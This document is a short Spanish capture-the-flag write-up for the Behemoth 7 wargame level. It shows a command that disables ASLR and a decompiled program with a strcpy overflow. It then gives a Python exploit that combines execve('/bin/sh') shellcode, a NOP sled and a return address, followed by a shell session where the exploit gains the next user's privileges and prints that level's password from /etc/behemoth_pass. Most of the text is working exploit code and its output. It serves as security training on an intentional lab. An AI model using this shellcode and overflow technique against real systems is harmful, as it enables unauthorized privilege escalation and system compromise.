Behemoth7
Recordamos deshabilitar ASLR con:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
undefined4 main(int param_1,int param_2,int param_3)
{
size_t __n;
ushort **ppuVar1;
char local_210 [512];
int local_10;
int Contador1;
char *local_8;
local_8 = *(char **)(param_2 + 4);
Contador1 = 0;
while (*(int *)(param_3 + Contador1 * 4) != 0) {
__n = strlen(*(char **)(param_3 + Contador1 * 4));
memset(*(void **)(param_3 + Contador1 * 4),0,__n);
Contador1 = Contador1 + 1;
}
local_10 = 0;
if (1 < param_1) {
while ((*local_8 != '\0' && (local_10 < 0x200))) {
local_10 = local_10 + 1;
ppuVar1 = __ctype_b_loc();
if ((((*ppuVar1)[*local_8] & 0x400) == 0) &&
(ppuVar1 = __ctype_b_loc(), ((*ppuVar1)[*local_8] & 0x800) == 0)) {
fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
/* WARNING: Subroutine does not return */
exit(1);
}
local_8 = local_8 + 1;
}
strcpy(local_210,*(char **)(param_2 + 4));
}
return 0;
}
from struct import *
import sys
SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
OFFSET = 'A'*512+'BBBB'*4
NOP_SLED = "\x90"*50
DIR_SHELLCODE = pack("I",0xffffd460 )
PAYLOAD = OFFSET+DIR_SHELLCODE+NOP_SLED+SHELLCODE
sys.stdout.write(PAYLOAD)
behemoth7@behemoth:/tmp/Marmeus$ /behemoth/behemoth7 $(python E7.py)
$ id
uid=13007(behemoth7) gid=13007(behemoth7) euid=13008(behemoth8) groups=13007(behemoth7)
$ cat /etc/behemoth_pass/behemoth8
pheewij7Ae
$